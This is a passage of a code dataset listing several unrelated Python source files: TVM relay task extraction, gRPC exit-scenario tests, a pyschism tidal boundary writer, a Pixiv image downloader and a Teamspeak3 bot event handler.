source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
from copy import deepcopy
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
# default case
# Try graph codegen first to extract autotvm tasks.
# If failed to compile, then fallback to use VM compiler.
# TODO: Currently VM compiler is likely to stack overflow for large models.
try:
# TODO(jwfromm) Remove this once AlterOpLayout bug that mutates
# source module is fixed. Until then, create a clone.
mod_clone = deepcopy(mod)
opt_mod, _ = relay.optimize(mod_clone, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(opt_mod["main"])
except tvm.TVMError as e:
print(
"Get errors with GraphExecutorCodegen for task extraction. "
"Fallback to VMCompiler. Error details:\n%s" % str(e)
)
mod_clone = deepcopy(mod)
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod_clone, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.compile_engine.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.compile_engine.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
|
_exit_scenarios.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator)
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument(
'--wait_for_interrupt', dest='wait_for_interrupt', action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server((), DaemonPool())
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
[REQUEST] * test_constants.STREAM_LENGTH)
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
|
bctides.py
|
from datetime import datetime, timedelta
import pathlib
from typing import Dict, Union
import logging
from pyschism import dates
from pyschism.mesh.vgrid import Vgrid
from pyschism.forcing.bctides import iettype, ifltype, isatype, itetype, itrtype, Tides
from pyschism.forcing.bctides.elev2d import Elev2D
from pyschism.forcing.bctides.uv3d import UV3D
from pyschism.forcing.bctides.mod3d import TEM_3D, SAL_3D
logger = logging.getLogger(__name__)
class IbctypeDescriptor:
def __init__(self, name, bctype):
self.name = name
self.bctype = bctype
def __get__(self, obj, val):
return obj.gdf[self.name]
def __set__(self, obj, val):
if val is not None:
if isinstance(val, dict):
for bnd_id, ibctype in val.items():
if not isinstance(val, (self.bctype, type(None))):
raise TypeError(
f"Argument {val} must be of type {self.bctype} "
f" or None, not type {type(ibctype)}."
)
# TODO
raise NotImplementedError("Need to find the column name")
idxs = obj.gdf[
(obj.gdf["id"] == bnd_id & obj.gdf["id"] == bnd_id)
].index.values
for idx in idxs:
obj.gdf.at[idx, val] = obj
else:
if not isinstance(val, self.bctype):
raise TypeError(
f"Argument {self.name} must be of type "
f"{self.bctype}, not type {type(val)}."
)
obj.gdf[self.name] = val
class BctidesMeta(type):
def __new__(meta, name, bases, attrs):
bctypes = {
"iettype": iettype.Iettype,
"ifltype": ifltype.Ifltype,
"isatype": isatype.Isatype,
"itetype": itetype.Itetype,
"itrtype": itrtype.Itrtype,
}
for name, ibctype in bctypes.items():
attrs[name] = IbctypeDescriptor(name, ibctype)
return type(name, bases, attrs)
class Bctides(metaclass=BctidesMeta):
start_date = dates.StartDate()
end_date = dates.EndDate()
def __init__(
self,
hgrid,
vgrid=None,
iettype: Union[Dict, iettype.Iettype] = None,
ifltype: Union[Dict, ifltype.Ifltype] = None,
isatype: Union[Dict, isatype.Isatype] = None,
itetype: Union[Dict, itetype.Itetype] = None,
itrtype: Union[Dict, itrtype.Itrtype] = None,
cutoff_depth: float = 50.0,
):
self.hgrid = hgrid
self.vgrid = Vgrid.default() if vgrid is None else vgrid
self.cutoff_depth = cutoff_depth
self.iettype = iettype
self.ifltype = ifltype
self.isatype = isatype
self.itetype = itetype
self.itrtype = itrtype
def __str__(self):
f = [
f"{str(self.start_date)}",
f"{self.ntip} {self.cutoff_depth}",
]
if self.ntip > 0:
for constituent in self.tides.get_active_potential_constituents():
forcing = self.tides(self.start_date, self.rnday, constituent)
f.append(
" ".join(
[
f"{constituent}\n",
f"{forcing[0]:G}",
f"{forcing[1]:G}",
f"{forcing[2]:G}",
f"{forcing[3]:G}",
f"{forcing[4]:G}",
]
)
)
f.append(f"{self.nbfr:d}")
if self.nbfr > 0:
for constituent in self.tides.get_active_forcing_constituents():
forcing = self.tides(self.start_date, self.rnday, constituent)
f.append(
" ".join(
[
f"{constituent}\n",
f"{forcing[2]:G}",
f"{forcing[3]:G}",
f"{forcing[4]:G}",
]
)
)
global_constituents = self.tides.get_active_constituents()
f.append(f"{len(self.gdf)}")
for boundary in self.gdf.itertuples():
f.append(self.get_forcing_string(boundary, global_constituents))
return "\n".join(f)
def write(
self,
output_directory,
start_date: datetime = None,
end_date: Union[datetime, timedelta] = None,
bctides: Union[bool, str] = True,
elev2D: Union[bool, str] = True,
uv3D: Union[bool, str] = True,
tem3D: Union[bool, str] = True,
sal3D: Union[bool, str] = True,
overwrite: bool = False,
parallel_download=False,
progress_bar=True,
):
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
# self.tidal_database.write(path, )
output_directory = pathlib.Path(output_directory)
output_directory.mkdir(exist_ok=overwrite, parents=True)
bctides = output_directory / "bctides.in" if bctides is True else bctides
if bctides.exists() and not overwrite:
raise IOError("path exists and overwrite is False")
with open(bctides, "w") as f:
f.write(str(self))
# write nudge
for bctype, tracer in {"itetype": "TEM", "isatype": "SAL"}.items():
for boundary in self.gdf.itertuples():
data_source = getattr(boundary, bctype)
if data_source is not None:
# I admit this exec is hacky.
# pros: works well, it's simple, we don't need a return value
# cons: might be confusing to read.
# This generates all the nudges and writes the nudge files.
exec(
f"from pyschism.forcing.bctides.nudge import {tracer}_Nudge;"
f"_tracer = output_directory / f'{tracer}_nudge.gr3' if {tracer.lower()}3D is True else {tracer};"
f"_tr={tracer}_Nudge(self, data_source, rlmax=data_source.rlmax, rnu_day=data_source.rnu_day);"
f'logger.info(f"Writing {tracer} nudge to file '
+ r'{_tracer}");'
"_tr.write(_tracer, overwrite=overwrite)"
)
break
def write_elev2D():
_elev2D = output_directory / "elev2D.th.nc" if elev2D is True else elev2D
Elev2D(self).write(
_elev2D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_uv3D():
# write uv3D.th.nc
_uv3D = output_directory / "uv3D.th.nc" if uv3D is True else uv3D
UV3D(self).write(
_uv3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_tem3D():
# write TEM_3D.th.nc
_tem3D = output_directory / "TEM_3D.th.nc" if tem3D is True else tem3D
TEM_3D(self).write(
_tem3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_sal3D():
_sal3D = output_directory / "SAL_3D.th.nc" if sal3D is True else sal3D
SAL_3D(self).write(
_sal3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
if parallel_download is True:
from multiprocessing import Process
jobs = [
Process(target=f)
for f in (write_elev2D, write_uv3D, write_tem3D, write_sal3D)
]
for job in jobs:
job.start()
for job in jobs:
job.join()
else:
if elev2D:
write_elev2D()
if uv3D:
write_uv3D()
if tem3D:
write_tem3D()
if sal3D:
write_sal3D()
# def write_tracer(tracer):
# tracer.write()
# for tracer in [self.temperature, self.salinity, *self.tracers]:
# if tracer is not None:
# write_tracer(tracer)
def get_forcing_string(self, boundary, global_constituents):
bctypes = [
boundary.iettype,
boundary.ifltype,
boundary.itetype,
boundary.isatype,
]
def get_focing_digit(bctype):
if bctype is not None:
# sensitive to MRO.
return str(
getattr(
bctype, f"{bctype.__class__.__bases__[0].__name__.lower()}")
)
return "0"
line = [
f"{len(boundary.indexes)}",
*[digit for digit in map(get_focing_digit, bctypes)],
]
f = [" ".join(line)]
for bctype in bctypes:
if bctype is not None:
f.append(
bctype.get_boundary_string(
self.hgrid, boundary, global_constituents=global_constituents
)
)
return "\n".join(f)
@property
def gdf(self):
if not hasattr(self, "_gdf"):
self._gdf = self.hgrid.boundaries.open.copy()
self._gdf["iettype"] = None
self._gdf["ifltype"] = None
self._gdf["isatype"] = None
self._gdf["itetype"] = None
self._gdf["itrtype"] = None
return self._gdf
@property
def ntip(self):
return len(self.tides.get_active_potential_constituents())
@property
def nbfr(self):
return len(self.tides.get_active_forcing_constituents())
@property
def rnday(self):
return self.end_date - self.start_date
@property
def tides(self):
if not hasattr(self, "_tides"):
class TidalConstituentCombiner(Tides):
def __init__(self, gdf):
self.gdf = gdf
afc = self.get_active_forcing_constituents()
apc = self.get_active_potential_constituents()
for constituent in set([*afc, *apc]):
self.use_constituent(
constituent,
forcing=True if constituent in afc else False,
potential=True if constituent in apc else False,
)
def get_active_forcing_constituents(self):
active_constituents = set()
for row in self.gdf.itertuples():
if row.iettype is not None:
if row.iettype.iettype in [3, 5]:
[
active_constituents.add(x)
for x in row.iettype.tides.get_active_constituents()
]
if row.ifltype is not None:
if row.ifltype.ifltype in [3, 5]:
[
active_constituents.add(x)
for x in row.ifltype.tides.get_active_constituents()
]
return list(active_constituents)
def get_active_potential_constituents(self):
active_constituents = set()
for row in self.gdf.itertuples():
if row.iettype is not None:
if row.iettype.iettype in [3, 5]:
[
active_constituents.add(x)
for x in row.iettype.tides.get_active_potential_constituents()
]
if row.ifltype is not None:
if row.ifltype.ifltype in [3, 5]:
[
active_constituents.add(x)
for x in row.ifltype.tides.get_active_potential_constituents()
]
return list(active_constituents)
@property
def constituents(self):
if not hasattr(self, "_constituents"):
self._constituents = sorted(
list(
set(
[
*self.get_active_potential_constituents(),
*self.get_active_forcing_constituents(),
]
)
)
)
return self._constituents
self._tides = TidalConstituentCombiner(self.gdf)
return self._tides
class TidesCombiner(Tides):
def __init__(self, bctides):
self.bctides = bctides
def get_active_potential_constituents(self):
const = dict()
# for row in self.bctides.gdf.itertuples():
# forcing = data['forcing']
# if isinstance(forcing, Tides):
# for active in forcing.get_active_potential_constituents():
# const[active] = True
# return tuple(const.keys())
# def get_active_forcing_constituents(self):
# # set active tidal forcing constituents
# const = dict()
# for id, data in self._model_domain.open_boundaries:
# forcing = data['forcing']
# if isinstance(forcing, Tides):
# for active in forcing.get_active_forcing_constituents():
# const[active] = True
# return tuple(const.keys())
# ----------- draft
# @property
# def tides(self):
# if not hasattr(self, '_tides'):
# # get the first one you can find, since the Tides object is a
# # singleton.
# tides = None
# for boundary in self.hgrid.boundaries.open.itertuples():
# if boundary.iettype is not None:
# if hasattr(boundary.iettype, "tides"):
# tides = boundary.iettype.tides
# break
# elif boundary.ifltype is not None:
# if hasattr(boundary.ifltype, "tides"):
# tides = boundary.ifltype.tides
# break
# self._tides = tides
# return self._tides
# @property
# def tracers(self) -> List[Dict[Any, Union[bctides.itrtype.Itrtype, None]]]:
# # if not hasattr(self, '_tracers'):
# # # tracers: List[Dict[Any, Union[itrtype.Itrtype, None]]] = []
# # boundary_data = {}
# # for boundary in self.hgrid.boundaries.open.itertuples():
# # itrtypes = boundary.itrtype
# # if itrtypes is None:
# # tracers.append({})
# # for tracer in boundary.itr
# # tracers.append()
# # tracer.setdefault(
# # )
# # _itrtype = boundary.itrtype
# # return self._tracers
# # TODO: Cheating for now...
# return []
# @property
# def ntip(self):
# if self.tides is None:
# return 0
# return len(self.tides.get_active_potential_constituents())
# @property
# def nbfr(self):
# if self.tides is None:
# return 0
# return self.tides.nbfr
# @property
# def Z0(self):
# if hasattr(self.tides, '_Z0'):
# return self.tides._Z0
# @Z0.setter
# def Z0(self, Z0):
# self.tides.add_Z0(Z0)
# @property
# def cutoff_depth(self):
# return self._cutoff_depth
# @cutoff_depth.setter
# def cutoff_depth(self, cutoff_depth: float):
# self._cutoff_depth = float(cutoff_depth)
# @property
# def subtidal_database(self):
# return self._subtidal_database
# @subtidal_database.setter
# def subtidal_database(self, subtidal_database: SubTidalDatabase):
# if subtidal_database is not None:
# # self._subtidal_database = Tides(subtidal_database=subtidal_database)
# else:
# self._subtidal_database = None
# @property
# def elevation(self):
# return self._elevation
# @elevation.setter
# def elevation(self, elevation):
# if elevation is not None:
# assert isinstance(elevation, iettype.Iettype)
# self._elevation = elevation
# @property
# def velocity(self):
# return self._velocity
# @velocity.setter
# def velocity(self, velocity):
# if velocity is not None:
# assert isinstance(velocity, ifltype.Ifltype)
# self._velocity = velocity
# @property
# def temperature(self):
# return self._temperature
# @temperature.setter
# def temperature(self, temperature: Union[itetype.Itetype, None]):
# if temperature is not None:
# assert isinstance(temperature, itetype.Itetype)
# self._temperature = temperature
# @property
# def salinity(self):
# return self._salinity
# @salinity.setter
# def salinity(self, salinity: Union[isatype.Isatype, None]):
# if salinity is not None:
# assert isinstance(salinity, isatype.Isatype)
# self._salinity = salinity
# class HgridDescriptor:
# def __set__(self, obj, val: Hgrid):
# if not isinstance(val, Hgrid):
# raise TypeError(
# f'Argument hgrid must be of type {Hgrid}, not type '
# f'{type(val)}.')
# obj.__dict__['hgrid'] = val
# def __get__(self, obj, val):
# return obj.__dict__['hgrid']
# class StartDateDescriptor:
# def __set__(self, obj, val: datetime):
# if not isinstance(val, datetime):
# raise TypeError(
# f'Argument start_date must be of type {datetime}, '
# f'not type {type(val)}.')
# if datetime_is_naive(val):
# val = pytz.timezone('UTC').localize(val)
# obj.__dict__['start_date'] = val
# def __get__(self, obj, val):
# return obj.__dict__['start_date']
# class RndayDescriptor:
# def __set__(self, obj, val: Union[int, float, timedelta]):
# if not isinstance(val, (int, float, timedelta)):
# raise TypeError(
# f'Argument rnday must be of type {int}, {float} or '
# f'{timedelta}, not type {type(val)}.')
# if not isinstance(val, timedelta):
# val = timedelta(days=val)
# obj.__dict__['rnday'] = val
# def __get__(self, obj, val) -> timedelta:
# return obj.__dict__['rnday']
|
main.py
|
import requests
import json
import sys
import traceback
import time
import re
import os
import threading
# User-Agent
userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"
# Export Log
exportLog = False
# Export Log File
exportLogfile = "log.txt"
# Api Address
apiAddress = "https://www.pixiv.net/ajax/illust/"
authorPrefix = "https://www.pixiv.net/ajax/user/"
authorSuffix = "/profile/all"
# Cookies
# Use ";" to split each term
cookies = ""
# Threads per second
threads_per_sec = 10
# Enable Proxy
enable_proxy = False
# Enable Remote DNS Resolve via Proxies
enable_remote_dns = True
# Proxy Settings
socks5_proxy_address = "127.0.0.1"
socks5_proxy_port = "1080"
if not enable_proxy:
proxiesDict = {}
else:
if enable_remote_dns:
proxiesDict = {
'http': "socks5h://" + socks5_proxy_address + ":" + socks5_proxy_port,
'https': "socks5h://" + socks5_proxy_address + ":" + socks5_proxy_port
}
else:
proxiesDict = {
'http': "socks5://" + socks5_proxy_address + ":" + socks5_proxy_port,
'https': "socks5://" + socks5_proxy_address + ":" + socks5_proxy_port
}
def print_log(content):
print(time.strftime('%Y-%m-%d %H:%M:%S\t', time.localtime(time.time())) + content)
sys.stdout.flush()
if exportLog:
f_log = open(exportLogfile, "a")
f_log.write(time.strftime('%Y-%m-%d %H:%M:%S\t', time.localtime(time.time())) + str(content) + '\n')
f_log.close()
return
def mkdir(path):
folder = os.path.exists(path)
if not folder:
os.makedirs(path)
print_log("Folder created.")
else:
print_log("Folder exist!")
def work(illust_id):
try:
contentJSON = requests.get(apiAddress + illust_id, headers=headers, proxies=proxiesDict)
decodeContent = json.loads(contentJSON.text)
if decodeContent['error'] == True:
print_log("Illustration error.")
else:
if not os.path.exists(foldername + "\\" + illust_id + ".png"):
print_log("Downloading\t [" + decodeContent['body']['illustTitle'] + "]")
# print_log("\tAuthor\t [" + decodeContent['body']['userName'] + "]")
# print_log("\tRAW URL\t [" + decodeContent['body']['urls']['original'] + "]")
# print_log("\tRAW URL\t [" + decodeContent['body']['urls']['regular'] + "]")
headers1 = {
'Referer': 'https://www.pixiv.net/member_illust.php?mode=medium&illust_id=' + i,
'cookie': cookies
}
content = requests.get(decodeContent['body']['urls']['original'], headers=headers1, proxies=proxiesDict)
f = open(foldername + "\\" + illust_id + ".png", "wb")
f.write(content.content)
f.close()
else:
print_log("Skip\t [" + decodeContent['body']['illustTitle'] + "]")
except:
traceback.print_exc()
if __name__ == "__main__":
headers = {
"User-Agent": userAgent,
"cookie": cookies
}
while True:
# Fetch thumb list
author_id = str(input()).strip().strip("\n")
contentJSON = requests.get(authorPrefix + author_id + authorSuffix, headers=headers, proxies=proxiesDict)
decodeContent = json.loads(contentJSON.text)
# Regex Match
try:
illusts = re.findall("[0-9]+", str(decodeContent['body']['illusts']))
except:
continue
print_log("Counter\t" + str(len(illusts)))
# print_log(str(decodeContent))
try:
foldername = re.findall("'userName': '(.*)', 'userImageUrl'", str(decodeContent['body']['pickup']))[0]
except:
try:
foldername = re.findall("<title>「(.*)」.*</title>",
requests.get("https://www.pixiv.net/member.php?id=" + author_id,
headers=headers, proxies=proxiesDict).text)[0]
except:
foldername = author_id
print_log(foldername)
mkdir(foldername)
waitcount = 0
# Fetch item info
threads = []
for i in illusts:
illust_id = i
t = threading.Thread(target=work, args=(illust_id,))
t.setDaemon(False)
t.start()
threads.append(t)
waitcount = waitcount + 1
if waitcount % threads_per_sec == 0:
time.sleep(1)
# t.join()
for thr in threads:
if thr.is_alive():
thr.join()
print_log("Job finished.")
|
EventHandler.py
|
"""EventHandler for the Teamspeak3 Bot."""
import ts3.Events as Events
import logging
import threading
class EventHandler(object):
"""
EventHandler class responsible for delegating events to registered listeners.
"""
logger = logging.getLogger("eventhandler")
logger.setLevel(logging.INFO)
file_handler = logging.FileHandler("eventhandler.log", mode='a+')
formatter = logging.Formatter('Eventhandler Logger %(asctime)s %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info("Configured Eventhandler logger")
logger.propagate = 0
def __init__(self, ts3conn, command_handler):
self.ts3conn = ts3conn
self.command_handler = command_handler
self.observers = {}
self.add_observer(self.command_handler.inform, Events.TextMessageEvent)
def on_event(self, sender, **kw):
"""
Called upon a new event. Logs the event and informs all listeners.
"""
# parsed_event = Events.EventParser.parse_event(event=event)
parsed_event = kw["event"]
if type(parsed_event) is Events.TextMessageEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ChannelEditedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ChannelDescriptionEditedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientEnteredEvent:
logging.debug(type(parsed_event))
elif isinstance(parsed_event, Events.ClientLeftEvent):
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientMovedEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ClientMovedSelfEvent:
logging.debug(type(parsed_event))
elif type(parsed_event) is Events.ServerEditedEvent:
logging.debug("Event of type " + str(type(parsed_event)))
